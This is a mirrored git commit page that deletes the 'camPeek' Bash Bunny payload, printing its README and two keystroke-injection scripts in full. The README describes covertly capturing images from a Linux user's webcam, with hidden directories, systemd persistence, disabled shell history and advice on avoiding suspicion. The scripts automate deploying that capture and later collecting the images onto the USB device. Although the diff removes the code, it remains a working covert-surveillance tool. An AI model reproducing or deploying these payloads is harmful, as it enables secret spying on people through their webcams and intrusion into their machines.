hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Delete camPeek directory

Browse Source
This commit is contained in:
drapl0n
2022-04-01 22:10:59 +05:30
committed by GitHub
parent afee861549
commit 0fccb70651
3 changed files with 0 additions and 154 deletions
Download Patch File Download Diff File Expand all files Collapse all files

55
camPeek/README.md
View File

@@ -1,55 +0,0 @@
## About:
* Title: camPeek
* Description: camPeek payload peeks through targets web cam and capture images and stores them in bunny.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Execution
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID, Storage
## CamPeek: camPeek payload is divided into two modules, First peeks through targets web cam and capture images and Second stores them in bunny.
### Features:
* Robust Payload for capturing targets images.
* No additional dependencies required.
* Persistent.
* Autostart payload on boot.
### Payload:
* Payload is divided into two modules:
1) Deployment: In this stage payload is deployed in targets system.
2) Exfiltration: Storing saved loot from targets system in bunny.
### Payload Script's Workflow:
* Stop storing histroy.
* Grep bunny's mount point of bunny.
* Creating hidden directory in /var/tmp/..... for obfuscation.
* Copying ffmpeg and image capturing mechanism in target's system.
* Creating systemd service for persistance and triggering mechanism for autostart.
### Changes to be made:
* Change time interval of capturing image, more the time interval target gets less suspicious, default time interval is 120 secs. Make changes in `systemBus` on line number `4`.
### LED Status:
* `SETUP` : MAGENTA
* `ATTACK` : YELLOW
* `FINISH` : GREEN
### Note:
* Download pre compiled static build of ffmpeg from: https://github.com/drapl0n/temp/releases/download/ffmpeg/ffmpeg and move it in camPeek directory.
* Due to big size of binary, it is not provided in this repo.
* Craete directory name `camPeek` in `/loot/` for storing captured images.
### Directory Structure of payload components:
| FileName | Directory |
| -------------- | ----------------------------- |
| switch1/payload.txt | /payloads/switch1/ |
| switch2/payload.txt | /payloads/switch2/ |
| camPeek/ | /payloads/libray/ |
### Usage:
1. Deploy first payload during absence of target using `switch1`.
2. Execute second payload during absence of target to store captured images in bunny using `switch2`.
#### Support me if you like my work:
* https://twitter.com/drapl0n

56
camPeek/switch1/payload.txt
View File

@@ -1,56 +0,0 @@
# Title: camPeek
# Description: camPeek payload peeks through targets web cam and capture images.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Execution
# Target: GNU/Linux operating systems with systemd.
# Attackmodes: HID, Storage.
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/library/camPeek/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh
Q ENTER
Q DELAY 12000
Q STRING rm /tmp/payload.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH

43
camPeek/switch2/payload.txt
View File

@@ -1,43 +0,0 @@
# Title: camPeek
# Description: camPeek payload's exfilteration module to move captured images to bunny.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Execution
# Target: GNU/Linux operating systems with systemd.
# Attackmodes: HID, Storage.
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
# create directory named camPeek in /loot/
Q STRING mv /var/tmp/.system/sysLog/* '$mntt'/loot/camPeek/ \&
Q ENTER
Q STRING disown \&\& exit
Q ENTER